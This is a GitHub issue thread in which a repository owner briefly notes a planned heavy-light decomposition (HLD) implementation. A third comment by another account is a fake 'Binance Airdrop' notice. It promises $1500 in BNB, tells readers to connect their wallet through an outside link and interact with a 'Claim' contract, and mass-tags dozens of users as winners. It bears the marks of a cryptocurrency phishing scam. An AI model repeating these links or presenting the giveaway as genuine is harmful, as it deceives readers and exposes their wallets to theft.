### ISSUE TITLE
HLD

### ISSUE THREAD

**Issue by DDing77** [DDing77/Alogorithm_BOJ-java-#5]
HLD 구현

**Comment by DDing77** [comment]
추후 문제 항목 추가

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @Prosouth, @lixw668, @PaoJiao, @arnaud-devops, @y11en, @OctoD, @claytonsulby, @KapitalEarth, @DevEdOPS, @nhowze, @yanglianxiao, @Hodugwaja, @MasoumiSaeed, @Logan1016, @adamfahmi, @xingheng, @dreimac1, @iarizmendialvarez, @gcakir, @ekpoam, @wangyanchang21, @therustmonk, @GhiaC, @salahsaad1997, @besteady, @ashwinvin, @luowenzhengxiong, @bartolomej, @antoniopucciarelli, @YuraPogoduk, @icyfry, @crisgon, @landoyjx, @mestoness, @maurilio, @khacchan, @jeanswhy, @xchanmolx, @lanqsh, @najafireza1996, @gregors, @BillyFrcs, @balloontmz, @YiwanGi, @artptrapp, @linaGirl, @hasanparasteh, @Yoon-Tae-Jun, @Kunal1410, @DarlingKing
